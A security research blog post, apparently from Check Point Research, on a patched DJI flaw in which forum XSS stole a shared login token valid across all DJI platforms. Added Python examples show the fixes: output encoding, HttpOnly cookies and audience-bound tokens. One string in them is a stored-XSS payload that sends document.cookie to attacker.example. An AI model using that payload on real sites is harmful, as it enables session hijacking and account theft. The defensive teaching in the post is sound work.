In the 19th Century the undercover operations of the Great Game captured the imagination of European adventurers. In the 20th Century, it was the Cold War that made people worldwide fear who was listening in. In the 21st Century, an age of cyber espionage, a sinister Game of Drones could be emerging to tempt cyber criminals, and it is a spy game global enterprises should not ignore.
In recent eye-opening research, our team uncovered how spying on enterprises, not to mention hundreds of thousands of private individuals, could well have been possible via an account takeover of commercial and consumer drones manufactured by the world's leading drone vendor, DJI.
Check Point Research informed DJI in March 2018, and DJI responded responsibly. The vulnerability has since been patched. DJI classified it as high risk but low probability, and indicated there is no evidence it was ever exploited by anyone other than Check Point researchers.
What Is At Risk?
The research team’s work demonstrated how an attacker could gain full access to a user’s account across each of DJI’s account platforms and steal the following, mostly cloud-based, data:
- The drone’s flight records and photos taken during a flight, if a DJI user had synced them with DJI’s cloud servers.
- Information associated with a DJI user’s account (e.g. user profile information, credit card details and more)
- The drone's real-time camera, microphone and map view
- A live view of the drone pilot’s camera and location, if a DJI user were using DJI’s FlightHub flight management software.
What’s more, an attacker would gain access to all the above information with the user remaining completely unaware of such an intrusion.
(Please note: screenshots of flight paths and images seen in this video and the diagram below were taken with thanks to Airdata, who was not involved in this research and was not affected by this vulnerability.)
Who Uses Drones?
The civilian drone and aerial imaging technology industry is now worth an eye-watering $127 billion. Clearly, drones are no longer the domain of gadget enthusiasts alone. Within this figure, DJI reportedly accounts for around 70% of the global commercial and consumer drone market.
Drones are increasingly used in the corporate landscape, with customers in critical infrastructure, manufacturing, agriculture, construction, emergency management, government agencies, the military and other sectors.
For example, telecoms companies use drones to provide temporary internet coverage to battlefields, disaster zones and hard-to-reach areas for search and rescue operations.
Airlines have also adopted drone technology to inspect machinery and infrastructure damage, using smart navigation and computer vision to get accurate data from hard-to-reach places. Likewise, drones are used in some of the largest energy plants around the world to inspect dangerously high areas that were previously accessed by company employees. Indeed, drones are often considered far faster, safer and more economical than traditional inspection methods.
In addition, delivery and logistics companies are increasingly making heavy use of drones, primarily flying pre-programmed flight paths, to carry out their tasks.
Previous concerns regarding the security of drones focused on the hijacking of the drone itself, often referred to as 'dronejacking', or on using these unmanned aerial vehicles (UAVs) to fly over sensitive locations such as the White House. Our research uncovered a simpler and perhaps more serious threat to an organization's data: a customer account takeover. Let's take a look at what this could mean for drone users everywhere.
The Potential Damage
Used by so many customers worldwide, both consumer and corporate, drone vendors are in effect massive data-collecting machines, obtaining images and other sensitive information about a large range of subjects. For while users are collecting useful footage that aids them in their work or play, they are often simultaneously, and even unknowingly, sending that collected data to the cloud. This is a feature offered by many drone vendors to provide a superior service built on a cloud infrastructure. Imagine, then, what damage could be done if cyber criminals were to get their hands on that data.
Information provided by drones, such as flight paths, photos, aerial video footage and maps, offers a threat actor key information for the first stage of any cyber or physical attack – reconnaissance.
For those looking to target critical infrastructure facilities such as energy plants or water dams, for example, analyzing intricate details and images of such facilities could easily reveal information that would prove highly useful in a future attack. A threat actor would be able to home in on various technologies to find out which vendor of CCTV cameras or biometric/electronic door locks an enterprise may be using, that could then be investigated to find the correct tools that could bypass them. Indeed, having a detailed view of sensitive areas could reveal to criminals and potential terrorists where security gaps in general may lie, and pave the path to exploiting those gaps.
In the case of delivery and logistics companies, a threat actor may well want to view the pre-programmed flight paths in order to learn which packages are being delivered where and to whom, and intercept them for their own gain. Having information about these flight paths would put them in an ideal position to carry out such an operation.
In general, the surveillance capabilities that hacked drones, or their connected customer accounts, can offer provide a rich resource of information for threat actors. And of course, if this data is not directly useful to one threat actor, it is not hard to find another on the Dark Web to whom it is and could be sold.
And finally, the potential for sensitive data breaches of the kind exposed by our researchers would also expose an organization to a serious loss of reputation. After all, it would certainly reflect badly on any organization to have its entire physical infrastructure (e.g. factories, power plants, military bases etc.) exposed to the public domain, not to mention the financial cost of penalties under the recently implemented GDPR.
The Mechanics of the Attack
To explain how our team of researchers managed an account takeover of any DJI customer, it is important to note that DJI drone customers are able to log into their account via three cloud-based platforms, all of which share the same user authentication infrastructure:
- DJI’s Web Platform (account, store, forum)
- DJI's GO, GO 4 and Pilot mobile applications
- DJI’s Flighthub (a centralized drone operations management platform)
By exploiting a flaw in DJI's customer identification process, our research team was able to hijack a user's account and take complete control over any of these cloud-based platforms and the data stored there.
Starting with an examination of the user identification process performed by DJI's login platforms, it soon became apparent that DJI's back-end identified each user with the same identifying token across all platforms. It was then fairly straightforward to craft an XSS attack that could be posted within the DJI forum, which is used by hundreds of thousands of DJI customers, to intercept that identifying token and use it to log in as the customer. Unlike most account takeovers, which rely on social engineering to fool the victim into handing the attacker their login credentials, our team simply collected the user's identifying token via a regular-looking link posted in DJI's forum, and with it could enter the victim's account across all platforms.
In this way, having obtained the user's identifying token, the attacker could hijack the account, log in and gain access to the flight and personal data registered to the victim's drone. Because all of DJI's platforms share the same user authentication infrastructure, once the identifying token was acquired it could be used to access any of these platforms and the information stored within them.
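To make the mechanics concrete, the following is an added example and not Check Point's or DJI's code. It models a stored XSS vector in a forum post that ships a browser-held identifying token off-site, and the two server-side controls that close that path: encoding user content on output, and marking the token cookie HttpOnly so script cannot read it at all. The post text, the cookie name `identifying_token`, the attacker host and the "browser" check are all constructed for the illustration; the real token's transport is not stated on this page and is assumed here to be a cookie.

```python
"""Added example: stored XSS exfiltrating a session token, and the fixes.
Not DJI's or Check Point's code; all names and payloads are constructed."""
import html
import re

# Constructed attacker payload. The image never loads, so the onerror
# handler runs in the victim's browser and sends document.cookie away.
ATTACKER_POST = (
    'Great footage! <img src="x" '
    'onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">'
)


def render_post_vulnerable(body: str) -> str:
    """Interpolates user-supplied post text straight into the page HTML."""
    return f'<div class="post">{body}</div>'


def render_post_hardened(body: str) -> str:
    """Encodes < > & and quotes so the browser treats the text as data,
    not markup. Correct for an HTML text context; attribute, URL and
    script contexts need their own encoders."""
    return f'<div class="post">{html.escape(body, quote=True)}</div>'


# Stand-in for the browser: does the rendered page contain an element
# carrying an inline event handler (onerror=, onload=, ...)?
EVENT_HANDLER = re.compile(r"<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def contains_script_vector(rendered_html: str) -> bool:
    return EVENT_HANDLER.search(rendered_html) is not None


def session_cookie_header(token: str, http_only: bool) -> str:
    """Set-Cookie header an identity service would emit for the token.
    'identifying_token' is an assumed name, not DJI's."""
    attrs = ["Path=/", "Secure", "SameSite=Lax"]
    if http_only:
        attrs.append("HttpOnly")
    return f"Set-Cookie: identifying_token={token}; " + "; ".join(attrs)


def readable_by_document_cookie(set_cookie: str) -> bool:
    """Browsers never expose HttpOnly cookies through document.cookie."""
    return "httponly" not in set_cookie.lower()


if __name__ == "__main__":
    for label, render in (("vulnerable", render_post_vulnerable),
                          ("hardened", render_post_hardened)):
        page = render(ATTACKER_POST)
        print(f"{label:10} script vector present: {contains_script_vector(page)}")
    for flag in (False, True):
        hdr = session_cookie_header("constructed-token", http_only=flag)
        print(f"HttpOnly={flag!s:5} readable by script: {readable_by_document_cookie(hdr)}")
```

Output encoding removes the injection; HttpOnly is defence in depth for the case where some other page on the domain is still injectable. Note that HttpOnly stops the token being copied out of the browser, but a script running in the victim's session can still make authenticated requests from inside it, so neither control replaces fixing the XSS itself.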
Diagram: The three attack flows to steal sensitive data from any of the DJI drone user platforms.
A cause for concern here is how security took a back seat to convenience in the product's design. While it may be convenient for a web or app developer to use a single identifier to recognize users across a product's various services, it also makes it easy for a threat actor to move laterally across each system and access the data stored there.
This, after all, is a common issue in product design. The trade-off between product functionality, user experience and security requirements is a careful balancing act. It is one that manufacturers of IoT devices and software developers alike are slowly coming to appreciate, and it needs to be tilted further towards security; there is still much room for improvement.
Example of the data accessible from a drone’s flight log.
(Please note: the screenshots of flight paths and images seen above were taken with thanks to Airdata, who was not involved in this research and was not affected by this vulnerability.)
A Lesson Learned
Cloud services, by their very nature, are accessible from anywhere. While this, of course, has its advantages, it also makes them more susceptible to account takeover attacks. Because of this, it is vital that cloud service providers protect their users by offering a two-factor authentication mechanism, so that safe authentication is provided for users who access their services remotely. Note that two-factor authentication hardens the login step; it does not by itself protect a session token that has already been issued and is then stolen through XSS, which is why it must be combined with the segmentation discussed next.
Another takeaway from this research is the need for segmentation not only at the network infrastructure level but also in the user identification process, whereby access to one service does not automatically grant access to all services.
Segmentation is recommended for all organizations across their IT networks in order to contain and limit the damage inflicted by a potential attack. Just as an IT network should be segmented, so too should the data stored within it. Likewise, for cloud-based service providers, segmentation is paramount to minimizing the attack surface. Failing to implement it correctly is what enabled our team to exploit the identification process of one system and gain access to all the other systems connected to it.
Segmenting identity and data in this way, when web and application developers build their user platforms, is a crucial means by which organizations can ensure that attacks are limited in their scope and the damage they inflict.
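The segmentation point above is easiest to see in code. The following is an added example, not DJI's implementation, modelling an identity back-end that issues HMAC-signed tokens to three stand-in services. In the first mode one token with no service binding is accepted everywhere, so a token lifted from the forum also opens the flight-management service; in the second, each token carries an audience claim (the same idea as a JWT `aud`) and a token minted for the web platform is refused elsewhere. The service names, signing key and user identifier are constructed for the illustration.

```python
"""Added example: one shared identifier versus per-service (audience-bound)
tokens. Not DJI's code; services, key and user ids are constructed."""
import base64
import hashlib
import hmac
import json
from typing import List, Optional

# Stand-ins for the three platforms that shared one authentication back-end.
SERVICES = ("web", "mobile", "flighthub")
SECRET = b"constructed-server-side-signing-key"   # assumption, not a real key


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint(user_id: str, audience: Optional[str]) -> str:
    """Issue payload.signature. audience=None models the single identifier
    that every platform accepted; a string binds the token to one service."""
    claims = {"sub": user_id}
    if audience is not None:
        claims["aud"] = audience
    payload = json.dumps(claims, sort_keys=True).encode()
    sig = hmac.new(SECRET, payload, hashlib.sha256).digest()
    return f"{_b64(payload)}.{_b64(sig)}"


def authenticate(token: str, service: str, require_audience: bool = True) -> Optional[str]:
    """Return the user id if this service should accept the token, else None.
    require_audience=False is the weak, shared-identifier policy."""
    try:
        payload_b64, sig_b64 = token.split(".")
        payload, sig = _unb64(payload_b64), _unb64(sig_b64)
    except ValueError:
        return None
    expected = hmac.new(SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None                       # forged or tampered
    claims = json.loads(payload)
    aud = claims.get("aud")
    if aud is None:
        return claims["sub"] if not require_audience else None
    return claims["sub"] if aud == service else None


def services_reachable(token: str, require_audience: bool = True) -> List[str]:
    """Which platforms would log the holder of this token in?"""
    return [s for s in SERVICES if authenticate(s and token, s, require_audience)]


if __name__ == "__main__":
    shared = mint("pilot-42", audience=None)
    scoped = mint("pilot-42", audience="web")     # what a forum page would hold
    print("shared token, weak policy  :", services_reachable(shared, require_audience=False))
    print("shared token, strict policy:", services_reachable(shared))
    print("web-scoped token, strict   :", services_reachable(scoped))
```

Audience binding limits the blast radius of a stolen token to the service it was issued for; it does not protect that one service, so it belongs alongside short token lifetimes and the HttpOnly and output-encoding controls that keep the token out of an attacker's hands in the first place. Re-labelling a web token's audience as `flighthub` without the signing key breaks the signature and is refused.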
So, although the balancing act between usability and security is indeed a challenging one, especially so in a very competitive environment that most companies operate within, it is an area which requires innovative approaches and smart design choices. Manufacturers cannot afford to ignore security in favour of usability alone and must keep security high up their list of priorities.
The primary method of account takeover is often thought to be phishing, most commonly by stealing a user's login credentials through social engineering. Our recent research into DJI drones illustrates, however, that other methods are available to cyber criminals.
It also acts as a reminder that consumer and corporate data alike is increasingly held in the cloud, on platforms we would not expect to hold such sensitive data. Unfortunately, data stored in the cloud is at higher risk of unwanted exposure because it sits beyond the customer's perimeter and control. As a result, customers need to be careful who they trust with their most sensitive data and choose a cloud-based service that offers adequate security.
Last year, Check Point Research illustrated how threat actors could infiltrate private homes or corporate offices via cameras held within smart vacuum cleaners. Prior to that, alerts were raised regarding wireless IP cameras that could act as potential entry points for cyber criminals. This latest example of how drones could offer a window for cyber espionage is merely another channel from where sensitive data can be collected and then stored in the cloud – and thus must be taken seriously.
Organizations are well advised to keep this in mind when they are structuring how their own internal data is stored. Furthermore, they should have this front of mind when selecting a cloud service and ensure they are asking the right questions with regards to how that service safeguards their customers’ security.
For while it is true that IoT devices have greatly enlarged the attack surface in the fifth generation of cyber security, it is the cloud itself, and unauthorized access to it, that poses the greater risk to organizations across all industries. As a result, organizations must ensure they are aware of the risks involved in being part of today's global game of business and take the measures required to ensure they are not tomorrow's victim of it.
For full technical details, please visit Check Point Research.